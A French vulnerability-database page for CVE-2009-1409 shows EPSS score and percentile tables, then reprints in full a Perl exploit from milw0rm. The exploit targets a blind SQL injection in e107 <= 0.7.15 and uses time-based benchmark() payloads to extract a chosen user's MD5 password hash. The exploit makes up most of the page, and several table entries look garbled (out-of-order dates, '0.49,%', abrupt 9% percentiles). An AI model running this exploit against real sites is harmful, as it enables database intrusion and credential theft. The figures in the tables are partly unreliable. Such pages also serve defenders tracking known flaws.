CVE-2009-1409 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	0.99%	–	–
2022-03-13	–	–	0.99%	–	–
2022-04-03	–	–	0.99%	–	–
2022-05-29	–	–	0.99%	–	–
2022-08-14	–	–	0.99%	–	–
2022-11-13	–	–	0.99%	–	–
2022-11-20	–	–	0.99%	–	–
2022-11-27	–	–	0.99%	–	–
2023-03-05	–	–	0.99%	–	–
2023-03-12	–	–	–	0.16%	–
2023-07-23	–	–	–	0.16%	–
2024-02-11	–	–	–	0.16%	–
2024-03-31	–	–	–	0.18%	–
2024-06-02	–	–	–	0.25%	–
2024-07-21	–	–	–	0.45%	–
2024-08-25	–	–	–	1.62%	–
2024-09-29	–	–	–	2.28%	–
2024-12-22	–	–	–	2.47%	–
2025-02-23	–	–	–	1.77%	–
2025-01-19	–	–	–	2.47%	–
2025-02-23	–	–	–	1.77%	–
2025-03-18	–	–	–	–	0.49%
2025-04-15	–	–	–	–	0.49%
2025-04-15	–	–	–	–	0.49,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	18%
2022-03-13	19%
2022-04-03	34%
2022-05-29	35%
2022-08-14	36%
2022-11-13	37%
2022-11-20	36%
2022-11-27	37%
2023-03-05	38%
2023-03-12	51%
2023-07-23	52%
2024-02-11	51%
2024-03-31	54%
2024-06-02	65%
2024-07-21	75%
2024-08-25	88%
2024-09-29	9%
2024-12-22	9%
2025-02-23	88%
2025-01-19	9%
2025-02-23	88%
2025-03-18	63%
2025-04-15	64%
2025-04-15	64%

#!/usr/bin/env perl # # e107 <= 0.7.15 "extended_user_fields" Blind SQL Injection Exploit # # Description # ------------------------------------------------------------------- # e107 contains one flaw that allows an attacker to carry out an SQL # injection attack. The issue is due to the "usersettings.php" script # not properly saniting user-supplied input to the hide[] key. # This may allow an attacker to inject or manipulate sql queries in # the backend database if magic_quotes_gpc = off. # ------------------------------------------------------------------- # Code Details (usersettings.php) # ------------------------------------------------------------------- # Line 433 - 441 # # if($ue_fields) { # $hidden_fields = implode("^", array_keys($_POST['hide'])); <------ {1} # # if($hidden_fields != "") # { # $hidden_fields = "^".$hidden_fields."^"; # } # $ue_fields .= ", user_hidden_fields = '".$hidden_fields."'"; <---- {2} # } # # Line 470 - 476 # # if($ue_fields) # { # [etc..] # $sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'"); # } # # ue[] POST variable needs a valid key # such as "aim","msn" or other user_extended_fields # (@fields array). # # Fix this sql injection using (php function) # mysql_real_escape_string to the POST 'hide' key, # otherwise find a way to fix it. dont care # ------------------------------------------ # Discovered & Written # by Juri Gianni aka yeat - staker[at]hotmail[dot]it # # Thanks to # --------------------------------------------- # JosS,girex,str0ke,certaindeath,plucky # #zeroidentity chan - http://zeroidentity.org # --------------------------------------------- # http://www.youtube.com/watch?v=0rgInHvW8Ic # http://www.youtube.com/watch?v=O2y62xcUJ8E # --------------------------------------------- use LWP::UserAgent; my $prefix = "e107_"; # default table_prefix my $type_i = undef; my $sock_u = new LWP::UserAgent; my ($domain,$user_name,$user_pwd,$target) = @ARGV; e107::Usage() unless scalar (@ARGV) > 3; e107::Login($user_name,$user_pwd); $type_i = e107::ExtendedField(); e107::Exploit(); sub e107::Usage { print "e107 <= 0.7.15 'extended_user_fields' Blind SQL Injection Exploit\n"; print "Usage: perl xpl.pl http://[host]/[path] [username] [password] [target id]\n"; print "Usage: perl xpl.pl http://localhost/e107 yeat an4rchy 1\n"; exit; } sub e107::Exploit { e107::Vulnerable(); e107::BruteForce(); } sub e107::SqlQuery { my ($do_query,$response,$start,$down,$element); $do_query = $_[0] || die $!; $start = time(); $response = $sock_u->post($domain.'/usersettings.php', [ "email" => 'doesnt@exists.net', "ue[user_$type_i]" => 1, "hide[$do_query]" => 1, "updatesettings" => 'Save Settings', ]) or die $!; $down = time(); return $down - $start; } sub e107::CheckField { my ($do_query,$response,$start,$down,$element); $do_query = $_[0]; $element = $_[1] || die $!; $start = time(); $response = $sock_u->post($domain.'/usersettings.php', [ "email" => 'doesnt@exists.net', "ue[user_$element]" => 1, "hide[$do_query]" => 1, "updatesettings" => 'Save Settings', ]) or die $!; $down = time(); return $down - $start; } sub e107::ExtendedField { my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage'); my $query = "\x27/**/OR/**/CASE/**/WHEN(1>0)/**/THEN". "/**/benchmark(100000000,CHAR(0))/**/END#"; for (my $i=1;$i<8;$i++) { if (e107::CheckField($query,$fields[$i]) > 6) { return $fields[$i]; last; } unless ($i != 8 && $fields[$i]) { die("Site not vulnerable..\n"); } } } sub e107::SqlBrute { my $ascii = $_[0]; my $limit = $_[1] || 1; my $sql_query = "\x27/**/OR/**/(SELECT/**/IF((ASCII(SUBSTRING(user_password,$limit,1))". "=$ascii),benchmark(200000000,CHAR(0)),0)/**/FROM/**/${prefix}user/**/". "WHERE/**/user_id=$target)#"; return $sql_query; } sub e107::BruteForce { my $i = 1; my @charset = (97..102,48..57); my $convert = undef; my $result = undef; for ($i..32) { foreach $convert (@charset) { if (e107::SqlQuery(e107::SqlBrute($convert,$i)) > 9) { syswrite(STDOUT,chr($convert)); $i++; last; $result .= chr($convert); } } } unless (length($result) != 32) { print "\nHash MD5: $result\n"; print "User ID: $target\n"; } } sub e107::Vulnerable { my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage'); for (my $i=1;$i<8;$i++) { if ($fields[$i] eq $type_i) { print "Exploiting..\n"; last; } else { die ("Site not vulnerable..\n"); } } } sub e107::Login { my ($username,$password) = @_; my ($result,$response); $response = $sock_u->post($domain.'/signup.php', [ username => $username, userpass => $password, userlogin => 'Login', autologin => 0 ]) or die $!; $result = $response->as_string; if ($result =~ /e107cookie=(\d+)\.([0-9a-f]{32})/i) { $sock_u->default_header('Cookie' => "e107cookie=$1.$2;"); $sock_u->agent('Lynx (textmode) - Logged'); } else { die("Login failed..\n"); } } # milw0rm.com [2009-04-20]